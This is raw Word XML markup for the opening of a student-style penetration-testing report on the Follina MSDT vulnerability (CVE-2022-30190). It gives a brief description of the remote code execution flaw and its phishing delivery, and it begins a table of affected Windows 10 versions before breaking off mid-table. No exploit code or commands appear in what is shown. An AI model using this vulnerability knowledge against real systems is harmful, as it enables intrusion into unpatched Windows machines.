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5B7EF" w14:textId="754103A9" w:rsidR="008C3301" w:rsidRPr="009001A3" w:rsidRDefault="00987314" w:rsidP="009001A3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009001A3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>SECURITY VULNERABILIT</w:t>
      </w:r>
      <w:r w:rsidR="009001A3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="009001A3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND PENETRATION TESTING</w:t>
      </w:r>
      <w:r w:rsidR="009001A3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009001A3" w:rsidRPr="009001A3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009001A3" w:rsidRPr="009001A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE-2022-30190</w:t>
      </w:r>
      <w:r w:rsidR="009001A3" w:rsidRPr="009001A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA204E" w14:textId="77777777" w:rsidR="009001A3" w:rsidRPr="009001A3" w:rsidRDefault="009001A3" w:rsidP="009001A3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2718A9" w14:textId="1D725211" w:rsidR="00F47D57" w:rsidRPr="0035550F" w:rsidRDefault="009614D3" w:rsidP="00FB6A0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009614D3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6A0E" w:rsidRPr="009614D3">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A206C98" w14:textId="2C7B5907" w:rsidR="008C3301" w:rsidRPr="003907CB" w:rsidRDefault="009614D3" w:rsidP="00FB6A0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="008C3301" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
      <w:r w:rsidR="00EB00F6" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB00F6" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>of the Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="003E67CC" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> “FOLLINA”</w:t>
      </w:r>
      <w:r w:rsidR="00EB00F6" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rStyle w:val="textlayer--absolute"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDAFF4C" w14:textId="30D5FD8E" w:rsidR="00C20E63" w:rsidRPr="00C20E63" w:rsidRDefault="00C20E63" w:rsidP="0035550F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Microsoft revealed a serious vulnerability on May 30, 2022, which they named CVE-2022-30190</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, or "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Follina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2].</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> This vulnerability exists in the Windows operating system's Microsoft Support Diagnostic Tool (MSDT), a tool for identifying and resolving Microsoft service problems. Unauthorized remote code execution (RCE) is made possible by the bug, which presents a serious risk, especially when using Microsoft Office products. By using phishing and social engineering techniques, attackers can take advantage of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Follina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gain access to, modify, or destroy data on impacted Windows PCs.</w:t>
      </w:r>
      <w:r w:rsidR="0035550F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09837C3C" w14:textId="77777777" w:rsidR="001646CD" w:rsidRPr="003907CB" w:rsidRDefault="001646CD" w:rsidP="001646CD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45408E93" w14:textId="6C0B4721" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="009614D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00BE1CAE" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Some of the e</w:t>
      </w:r>
      <w:r w:rsidR="00EC21A5" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ffected machines and versions</w:t>
      </w:r>
      <w:r w:rsidR="001646CD" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE1CAE" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="003157B2" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00BE1CAE" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="001646CD" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9040" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="665"/>
        <w:gridCol w:w="2673"/>
        <w:gridCol w:w="1814"/>
        <w:gridCol w:w="3888"/>
      </w:tblGrid>
      <w:tr w:rsidR="0064123C" w:rsidRPr="003907CB" w14:paraId="55D54E69" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="414"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328F1980" w14:textId="697989AE" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Sr No </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D22056" w14:textId="723B9BF6" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362F5F1B" w14:textId="0803FDA0" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52605CCF" w14:textId="2715281C" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0064123C" w:rsidRPr="003907CB" w14:paraId="18405BD6" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="822"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="732DEA7B" w14:textId="712C4B10" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438976CE" w14:textId="0DD3AD25" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
            <w:r w:rsidR="004C5532" w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004C5532" w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Windows 10 Version 1809</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B9F9C13" w14:textId="632B9EEE" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00F41899">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="007F6C70" w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>MSDT</w:t>
            </w:r>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A285E19" w14:textId="0EF8F2B4" w:rsidR="007F6C70" w:rsidRPr="003907CB" w:rsidRDefault="007F6C70" w:rsidP="007F6C70">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>From 10.0.0 before 10.0.17763.3046 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05333336" w14:textId="77777777" w:rsidR="00EC21A5" w:rsidRPr="003907CB" w:rsidRDefault="00EC21A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE329E" w:rsidRPr="003907CB" w14:paraId="476AB213" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="822"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038492A9" w14:textId="03A35D49" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FFB0EB3" w14:textId="05A8CFC8" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows 10 Version 21H1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6FB06F" w14:textId="3837CE33" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
